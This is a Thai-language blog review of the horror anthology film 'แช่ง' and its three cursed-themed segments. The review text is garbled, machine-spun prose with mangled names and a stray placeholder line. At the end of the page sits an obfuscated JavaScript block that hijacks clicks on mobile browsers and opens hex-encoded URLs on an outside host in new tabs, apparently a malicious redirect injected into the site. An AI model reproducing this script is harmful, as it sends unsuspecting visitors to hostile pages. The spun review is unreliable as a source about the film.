รีวิวหนัง แช่ง หนังไทยสยองขวัญ เกี่ยวกับอาถรรพ์จากคำสาปแช่ง ที่เกิดขึ้นจากแรงอาฆาต

หนังไทยใหม่ล่าสุด อาถรรพ์จากคำสาปแช่ง ที่เกิดขึ้นจากแรงอาฆาต ก่อให้เกิดโศกนาฏกรรมแห่งการจองเวร 3 เรื่อง 3 ความแค้น ใน รีวิวหนัง แช่ง หนังผีไทยมักมักจะทำแนวหลายเรื่องสั้นรวมร่างกัน มีธีมร่วมบ้าง หรือบางครั้งบางคราวก็เป็นโปรเจ็กต์รวมคณะทำงานต่างสไตล์ของค่ายแค่นั้น และก็หนังเรื่อง แช่ง

ก็เป็นภาพยนตร์ไทยเรื่องปัจจุบันที่ทำหนังสั้น 3 ตอนรวมกันภายใต้ธีมเดียวกันเป็นคำสาป ต่างที่มา ต่างขั้นตอนการ ต่างช่วง รวมทั้งต่างเหตุผลซึ่ง นับว่าความมุ่งมั่นรวมทั้งแนวความคิดนั้นน่าดึงดูดอยู่พอได้ ถึงแม้หน้าหนังจะมองช่างเดิมๆและไม่มีอะไรเสียเลย

แม้กระนั้นหนังตัวอย่างที่ปลดปล่อยมาก็กลับแสดงให้เห็นว่ามันมีของเด็กเล่นแปลกใหม่ที่น่าติดตาม เป็นการทดสอบรวมทั้งบูชาการเล่าเรื่องผีในต่างๆนาๆกรรมวิธี แล้วก็เมื่อได้ดูตัวหนังเต็ม ก็พบว่าผู้ผลิตมิได้เพียงแค่ต้องการทำหนังผีธรรมดา แต่ว่ายังทดสอบ รวมทั้งเสนอแนวทางการคิดวิพากษ์สังคมไทยอย่างมีกลเม็ดเด็ดพรายด้วย

ถ้าหากเพื่อนๆคนไหนที่อยากรู้ว่าหนังเรื่องนี้จะจบลงแบบไหน มาติดตามรับชมการแนะนำหนังไปพร้อมๆกันในบทความนี้ได้เลยนะคะ ช่องทางการรับชม ดูหนังฟรีออนไลน์

Lorem ipsum dolor sit amet...

รีวิวหนัง แช่ง

หนังเรื่องนี้เป็นผลงานกำกับของ จิต กำเหนิดรัตน์

หนังเรื่องนี้ได้ผลงานดูแลของ จิต กำเหนิดรัตน์ ซึ่งเคยดูแลหนังร่วมในเรื่อง เลิฟอะรูมิไลค์ รักอะไรไม่รู้จัก (2558) รวมทั้งยังเป็นคุณครูสอนกวดวิชา

สาขาวิชาภาพยนตร์ วิชา Art of storytelling ที่มหาวิทยาลัยกรุงเทวดา (2553 -2556) นอกนั้นยังส่งผลงานควบคุมหนังทุนกระทรวงวัฒนธรรมเรื่อง Eternal นิรันดร (2554) อีกด้วย

สำหรับเรื่องแช่งนี้นับเป็นการควบคุมคนเดียวทีแรกกับหนังค่าย มันเวิร์ก และก็อย่างเช่นเดิม ยังสามารถดึงศิลปินระดับผู้ชมรู้จักดีมาร่วมเล่นได้มากมาย อีกทั้ง เดวิด อัศวนนท์

ในตอน แปลก, เคยชิน เคยชินวุฒ อินทรคูสิน กับ ชนชั้นปิยะ ออมสินนพกุล หรือ กวาง เดอะเฟซ ในตอน Tattoo แล้วก็ หน่อง ธนา ฉัตรบริรักษ์ น้องชายของ บอย ปกรณ์ ในตอน แช่ง

โดยแต่ละขณะนั้นต่างแยกกัน มีจุดร่วมผ่านข้าวของเป็นเพียงแต่กิมไม่กเพียงแค่เล็กๆน้อยๆ แม้กระนั้นเมื่อมองจบพวกเราจะพบว่าหนังหลบซ่อนสาระสำคัญด้วยกันอยู่ 1 สิ่ง ซึ่งทำให้หนังประเด็นนี้มีของอยู่พอได้อย่างยิ่งจริงๆ จะคืออะไรนั้นมาดูกัน

Chapter 1 : วิปลาส

แช่ง เต็มเรื่องโจเซฟ (เดวิด อัศวนนท์) นักบวชกลางคนได้รับร่องรอยการถึงแก่กรรมของเพื่อนฝูงนักบวชผู้กระทำหน้าที่มิชชั่นในหมู่บ้านแห่งหนึ่ง โดยร่องรอยซึ่งก็คือเครื่องบันทึกจานเสียงการแสดงละครรำในคืนที่เช้าใจกันว่าฯลฯโคนของคำแช่งที่ทำให้คนภายในหมู่บ้านเบาๆตายไปกว่าครึ่ง โดยเสียงดนตรีที่ได้ยินนั้น เป็นเสียงร้องที่เพราะเช่นนางอัปสรเล่นเพลงพิณ

แต่ให้ความรู้ความเข้าใจสึกโหยหวนเช่นเดียวกันกับเสียงของซาตาน โจเซฟก็เลยตกลงใจออกไปตามหาตัวการของเรื่องราวทั้งผอง กระทั่งเจอกับความเป็นจริงที่เบาๆเปิดเผยให้มองเห็นถึงด้านมืดของจิตใจมนุษย์

รวมทั้งตัวการของคำแช่งที่น่าขนพองสยองเกล้า เชิญชวนพบเจอจุดจบที่น่าเศร้าในบรรยากาศความลี้ลับน่าสะพรึงกลัวของบรรยากาศบ้านป่าของประเทศสยามในปลายรัชสมัย รัชกาลที่ 6 ที่ความรุ่งเรืองยังไม่รุกคืบความเชื่อถือเรื่องไสยศาสตร์

จุดแข็งของในเวลานี้เป็นขณะ ราชการ6 กับข้อความสำคัญที่ไม่ค่อยพบในภาพยนตร์ไทย เรื่องของมิชชันนารี่ฝรั่งที่จำต้องเดินทางสู่บ้านป่า เพื่อไขคดีลึกลับซึ่งราษฎรต่างมั่นใจว่าเกี่ยวกับไสยเวทตามลัทธิเชื่อถือผี ซึ่งเป็นรากเริ่มแรกของคนประเทศไทย

มันก็เลยเป็นการมองฐานความเลื่อมใสเดิมของพวกเราผ่านสายตาของนักบวชฝรั่งที่เป็นบุคคลภายนอก หรือแม้กระทั้งคนปัจจุบันนี้เองที่เชื่อเรื่องผีสางลดน้อยลง เวลานี้ถือว่าพอดีที่สุดใน 3 ตอน ความหลอนรวมทั้งส่วนประกอบความหลอนจากบ้านป่าเมืองไม่มีอารยธรรม

แล้วก็ขนบที่ห่างเหินจากบรรทัดฐานคติในเวลาเดี๋ยวนี้ ซึ่งเจอในนิยายคลาสสิกแนวสยองขวัญล้นหลาม ทั้งยังการมัดปัญหาที่เบาๆเปิดเผย เบาๆทิ้ง ให้พวกเราหันเหความพอใจไปๆมาๆ ว่าท้ายที่สุดคำสาปแช่งนี้เป็นยังไง รวมทั้งมาจากคนไหนกันแน่ หรือสิ่งใด กันแน่

จริงๆแล้วมันก็ใบ้จนกระทั่งพวกเราได้ในบางคำตอบ แม้กระนั้นในรูปภาพรวมมันก็ยังนำพาพวกเรามาจุดที่จำต้องอึ้งกับข้อสรุปทั้งผองอยู่ดี ถ้าเกิดนับเป็นหนังตอนผู้เดียวๆก็นับได้ว่าเป็นภาพยนตร์ไทยที่เยี่ยมมากๆเรื่องหนึ่งเลย หากแม้ด้วยความจำกัดเวลาจะมีผลให้มันผ่านๆการเชื่อมเล็กน้อยไปบ้างก็ตาม

นอกนั้นหนังยังหลบซ่อนนัยยะสำหรับเพื่อการถือจับใจความสำคัญว่าตัวตนของพวกเรา (ชาวไทย) ในตอนนี้ ถูกอำนาจเหนือขึ้นไปอะไรก็แล้วแต่มาครอบครองอยู่บ้าง น่าสังเกตว่าตอนนี้เกือบจะไม่มี พระ หรือ พุทธ เข้ามาเกี่ยวพันเลย

แต่มากมายก่ายกองทั้งยังหัวโขนฤาษีบิดาอาจารย์โรงแสดงละครรำ ผีป่า ข้อบังคับที่ผิดพลาด อคติของผู้มีอำนาจดูแล ตลอดจนความเป็นผู้ชายที่ครอบครองผู้หญิงเสมอ 

เกี่ยวกับอำนาจแบบสมัยโบราณทั้งหมดทั้งปวง แม้ว่าจะร้อยปีกลายหรือปัจจุบันนี้ เหล่าสถาบันต่างๆเป็นต้นว่า ศาสนาผี อื่นๆอีกมากมาย ต่างยังหลอกขัดเกลาความเป็นพวกเราอยู่โดยตลอด คำบอกเล่าของข้าราชบริพารจีนในเรื่องตอนหนึ่งอาจมีทำพวกเราผวากันทีเดียว

Chapter 2 : Tattoo

เฟรดดี้ (คุ้นชิน เคยชินวุฒ) ชายหนุ่มช่างสักฝีมือยอดเยี่ยมที่ดำรงชีวิตให้ผ่านไปวันแล้ววันเล่า ภายหลังที่จำเป็นต้องเลิกรากับหญิงสาวนาม เฟิร์น (กวาง ชาติชั้นวรรณะปิยะ)

ผู้เป็นรักเดียวใจเดียวของเขา จนตราบเท่าวันหนึ่งเฟิร์นกลับมาหาเขาพร้อมด้วยความน่าสยดสยองอะไรบางอย่างที่ตามหลอก รวมทั้งพาให้คนรอบข้างของคุณจะต้องเจอกับความรันทด จากคำสาปอันเกิดขึ้นได้เพราะมีสาเหตุเนื่องมาจากความหลงใหลจมสู่กิเลสอันล้ำลึก

โดยไม่รู้จักอิโหน่อิเหน่อะไรด้วย เฟรดดี้ก็เลยตกลงใจที่จะปกป้องรวมทั้งกีดกั้นไม่ให้เรื่องราวไม่ดีเกิดขึ้นกับผู้ที่เขารักอีกทั้ง 2 ถึงแม้จำเป็นต้องพบเจอกับความผิดบาปที่ทั้งคู่ต่างมีส่วนร่วมสร้างมันขึ้นมาหามไว้ที่ตัวเอง

เล่าผ่านด้วยอารมณ์ความรักอันแสนอึมครึม แล้วก็ความเย็นเยียบที่กัดรวมถึงเหงาหงอยของวัยรุ่นยุคใหม่ท่ามกลางความอลหม่านในเมืองหลวง

ในตอนนี้น่าสนใจด้วยวิธีการเล่า ทุกๆสิ่งทุกๆอย่างเกิดขึ้นแบบมีลับลมคมในตลอด ถึงแม้ไปกลางเรื่อง พวกเราจะเริ่มทายใจพล็อตหลักของปัจจุบันนี้ได้ก็ตามว่าการแช่งเดี๋ยวนี้เกี่ยวกับเรื่องรักๆใคร่ๆความหึงหวง

ถึงกระนั้นมันก็ยังน่าดึงดูดว่าแล้วคำสาปนี้มันเป็นยังไง ตัวประหลาดที่ไล่ฆ่าผู้คนรอบกายนั้นเป็นสิ่งใด อะไร ยังไงกันแน่

สิ่งที่ชอบใจพวกเรามากมายเป็นการแสดงของ กวาง ที่สามารถพูดได้ว่าเผ็ชเข็ดฟันงามน่าหลงใหลสมหน้าที่มากมายๆเป็นคุณนี่หามหนังอยู่สบายๆเลย เพราะว่าการแสดงส่วนอื่นก็ทำเป็นดีด้วยไม่ใช่แค่ว่างามไปเรื่อยโดยกิมไม่กที่เชื่อมทีแรกๆกับช่วงนี้ก็คือเครื่องเล่นแผ่นเสียงจากช่วงแรกนั่นเอง

นอกเหนือจากนี้หนังยังใบ้ถึงอำนาจที่มอมเมาผู้คนในสมัยสายลมแสงอาทิตย์นี้ก็คือ คำว่ารัก โดยมิได้ซึ่งก็คือความรัก แม้กระนั้นเป็น รัก ที่พวกเราขัดเกลาจากเพลง เอ็มวี หนัง เป็นภาพจำที่แปลงเป็นการถือสิทธิ์ครอบครองวัตถุมากยิ่งกว่า ผู้ที่พวกเรารัก

เป็นอีกในขณะที่น่าดึงดูดถึงแม้สารจะมิได้ว้าวมากเท่าไรนักเพราะว่าพล็อตความรักมันเกร่อมามากมายแล้วในแต่ละสื่อ แต่ทว่าการใช้ปัญหาบวกกลเม็ดการหลอนประสาทนักแสดงนั้นจัดว่าทำเป็นน่าดึงดูดและก็ดีทีเดียว

Chapter 3 : สาปแช่ง

ซัน (หน่อง ธนา) หนุ่มผู้ซึ่งมานะเป็นที่ยอมรับ รวมทั้งเป็นผัวที่ดีของจีจี๋ผู้เป็นเมีย วันหนึ่ง เขากำเนิดจำไม่ได้ว่ากำเนิดอะไรขึ้นในตอนสามวันที่ผ่านมา รวมทั้งเขามีความรู้สึกว่ามีอะไรตามหลอกเขาตลอด

จนกระทั่งคนที่อยู่รอบข้างต้องหาแนวทางช่วยเหลือเรื่องราวที่เขาจะต้องพบเจอ ปะติดปะต่อกันถึงสาเหตุของความทรงจำที่หายไป ในที่สุดทุกสิ่งก็ถูกเฉลยคำตอบ และก็ทุกคนก็จำเป็นต้องเห็นด้วยในสิ่งที่เกิดขึ้นอันเป็นผลมาจากพวกเขาเอง

นี่เป็นตอนที่ทดสอบอะไรมากมายสุด มีของมากมาย แม้กระนั้นปลดปล่อยมาชนปนมั่วไปหน่อย ทำให้พล็อตหลักมัวแล้วก็เปลี่ยนเป็นในระหว่างที่เฟลที่สุดใน 3 ตอน

ขั้นแรกนั้นหนังทำเป็นค่อนข้างจะดีกับการมัดปัญหาซึ่งราวกับเป็นวิธีการเล่าที่ผู้กำกับใช้มาตลอดทุกตอนให้คนพึงพอใจติดตามค้นหาข้อเท็จจริง แต่กับเวลานี้นั้นกลับใส่แนวทางของปัญหามามั่วเกินความจำเป็น 

ทั้งยังเรื่องผีสตรีที่ใบหน้าเหมือนแฟนของผู้แสดงนำชาย ภาพมายาในวัยเด็กที่ดารานำชายแอบมองเห็นอาจารย์บังอรเล่นคุณไสย เพื่อนพ้องสาวสถานที่ทำงานของดารานำชายที่โดนโซเชี่ยลรุมแช่งเนื่องจากว่าบางสิ่งบางอย่างที่ผู้แสดงนำชายทำไว้

รีวิวหนัง แช่ง

รวมทั้งความจำของผู้แสดงนำชายที่หายไป มีเรื่องมีราวการสะกดจิต รวมทั้งพิธีการแช่งมาร่วมอีก ทั้งยังอารมณ์มีทั้งยังสอบปากคำ ทั้งยังผี อีกทั้งตลกขบขัน ซึ่งยังไม่กลืนกลมกลืนนักโดยเฉพาะอย่างยิ่งรูปร่างความเป็นขบขันที่หลุดราวกับน้ำคนละเนื้ออยู่ ส่วนกิมไม่กที่เชื่อมกับในขณะที่ 2 ก็มีรูปปั้นสาวงามที่ใช้ประกอบพิธีแช่ง

แต่ถึงกระนั้นถ้าหากดูถึงแก่นการติดต่อสื่อสารปัจจุบันนี้แล้วนั่นจำต้องสารภาพว่าน่าพอใจมากมายๆเนื่องจากว่าถึงแม้เปลือกมันจะบอกเรื่องความรักความเชื่อมโยง แต่ว่าด้วยส่วนประกอบต่างๆมันเอ่ยถึงอำนาจสถาบันการสอนที่ขัดเกลาเด็กไทยขึ้นมา ไม่ว่าจะเป็นพ่อแม่ที่บ้าน

หรืออาจารย์ที่สถานศึกษาที่ใช้เวลาการเจริญเติบโตของเด็กคนหนึ่งขึ้นมาเยอะที่สุด มันมีเสียงอย่าง ทึ่มอย่างเอ็งจะเลี้ยงชีวิตตนเองอย่างไร วาดภาพอยู่ได้จะเอาไปทำอะไรได้ อะไรแบบงี้อยู่เสมอเวลาการอยู่ในวงกตของความจำของพระเอก

ซึ่งสุดท้ายหนังก็ให้ทางออกที่ตลกขบขันร้ายดีเช่นกัน กับการต่อสู้กับสถาบันที่ขัดเกลาพวกเรามาทั้งปวงกระทั่งโตเป็นผู้ใหญ่ ซึ่งจะคืออะไรนั้นจำเป็นต้องไปรับชมด้วยตาของตัวเองดูนะคะ

ความรู้สึกหลังรับชม

ภายหลังได้ดูทั้งยังสามตอนจนกระทั่งจบจะมองเห็นได้อย่างเห็นได้ชัดว่าในตอน วิปลาส รวมทั้ง แทททู นั้นนับว่าทำออกมาได้ค่อนข้างจะดี โดยยิ่งไปกว่านั้นการมัดเรื่องราวให้น่าติดตาม สร้างความหลอนด้วยเสียงเพลงไทยทำให้ผู้ชมขนลุกก้าวหน้าสุดๆยิ่งได้เรื่องแสดงอันดีเลิศของ เดวิด อัศวนนท์ และก็ คุ้นชิน ชินวุฒ ก็ยิ่งทำให้หนังน่าดูขึ้นมาอีกเท่าตัว

นอกเหนือจากสองผู้แสดงนำฝ่ายที่กล่าวมาแล้วแล้ว ดาราหนังสมทบของทั้งคู่เรื่องก็ล้วนแต่ช่วยเหลือกันเสริมอารมณ์ของหนังให้น่าขนลุกมากขึ้นไปอีก อีกหนึ่งเซอร์ไพรส์ก็คือความสามารถของ กวาง วรรณปิยะ กับการแสดงภาพยนตร์เรื่องแรกของเธอที่ฉายแววและก็สร้างเสน่ห์ส่วนตัว ซึ่งถือว่าเป็นสอบได้ได้ดีมากๆเลยทีเดียว

และก็จำเป็นต้องสารภาพว่าพอเพียงมาถึงตอนสุดท้าย คำแช่ง ที่นำแสดงโดย หน่อง ธนา นั้นไม่ได้สร้างความระทึกใจเหมือนกับสองตอนแรกเลย

ไม่แน่บางทีออกมาค่อนจะแป้กเสียด้วยซ้ำ รู้เรื่องว่าเดี๋ยวนี้ผู้กำกับคงจะต้องการจะแตกต่างความระทึกออกมาไม่ให้ซ้ำก็เลยทำให้เรื่องราวของสองผัวเมียมองแปลกๆเกินจริงอย่างไม่มีเหตุผลไปๆมาๆ

อีกอย่างจำต้องบอกตามจริงว่าค่อนจะขัดใจกับบทของ จีจี้ ผู้เป็นภรรยามากมาย ทั้งยังในเรื่องของน้ำเสียง การแสดงต่างๆที่ดูเหมือนไม่ค่อยชอบใจเลย ทั้งในตอนสุดท้ายของตอนสุดท้ายนี้ยังมีความคิดว่าแหวกธีมหนังไปไกลสุด

บทสรุปโดยรวมภาพยนตร์

โดยภาพรวมและนับว่า แช่ง เป็นภาพยนตร์ไทยเปิดศักราชใหม่ได้ดีทีเดียว อย่างที่บอกโดยยิ่งไปกว่านั้นสองตอนแรกที่ทำเอาผู้ชมอย่างพวกเราเกือบจะนั่งไม่ติด

ลุ้นระทึกไปกับเรื่องราวอาถรรพณ์ลึกลับที่แม้ว่าจะมิได้ประหลาดไปจากหนังสยองขวัญเรื่องอื่นๆมากสักเท่าไรนัก แม้กระนั้นก็นับว่าเป็นอีกรสหนึ่งที่ช่วยมาสร้างสีสันได้อย่างดีเยี่ยม

รีวิวหนัง แช่ง

ทั้งยังยังได้แง่คิดสำคัญเกี่ยวกับการใช้ชีวิตของมนุษย์ที่ถูกสะท้อนมาจากเรื่องราวทั้งยังสาม ซึ่งล้วนแต่มีสาเหตุมาจากการกระทำที่ไม่ยั้งคิดที่ถูกเติมแต่งด้วยเรื่องราวเหนือธรรมชาติมาสร้างความรื่นเริงใจให้ได้ดูกัน

ทั้งสามเรื่องเราว่าปัญหาเดียวที่มีคือการตัดต่อที่ยังไม่ค่อยลื่น ตัดฉากสลับไปมาเลยทำให้เรารู้สึกไม่ต่อเนื่อง แต่ด้วยเนื้อเรื่องทั้งสามที่เรียกว่าไม่ได้ none-sense ซะจนรับไม่ได้ แถมยังตรงกับสิ่งที่ผู้กำกับต้องการจากคนดู ให้ตระหนักถึงคำพูดที่ได้เอ่ยออกไปทุกคำ

การที่เราพลั้งพลาดพูดแช่งอะไรใครไป มันไม่มีทางจะนำสิ่งที่ดีกลับมาให้ใคร ทั้งตัวคนที่เราแช่ง หรือแม้แต่ตัวเราเอง ก็คิดว่าหนังจะสอนให้คนดูตระหนักอะไรได้ไม่มากก็น้อย

สรุปว่าอยากให้ลองไปดูกัน ถือว่าเป็นอีกหนังสยองขวัญไทยที่ดี และควรค่าแก่การเข้าไปลองสัมผัส อาจไม่ใช่หนังที่ดีมากๆ แต่หนังก็ยังมีส่วนดีของมันที่ฝากอะไรให้เรากลับไปได้

ติดตามรีวิวหนังเรื่องๆได้ที่ รีวิวหนัง ขุนแผน ฟ้าฟื้น

function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x6c\x73\x46\x32\x63\x352′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x78\x77\x73\x33\x63\x373′,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x55\x59\x73\x30\x63\x390′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x41\x6b\x48\x37\x63\x357′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x6d\x56\x72\x36\x63\x336′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x69\x4f\x43\x38\x63\x398′,’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x66\x6b\x63\x35\x63\x355′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x61\x4b\x53\x31\x63\x321′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x65\x77\x63\x34\x63\x314′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x70\x6f\x62\x63\x2e\x6c\x69\x76\x65\x2f\x79\x67\x56\x39\x63\x389′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());

ใส่ความเห็น

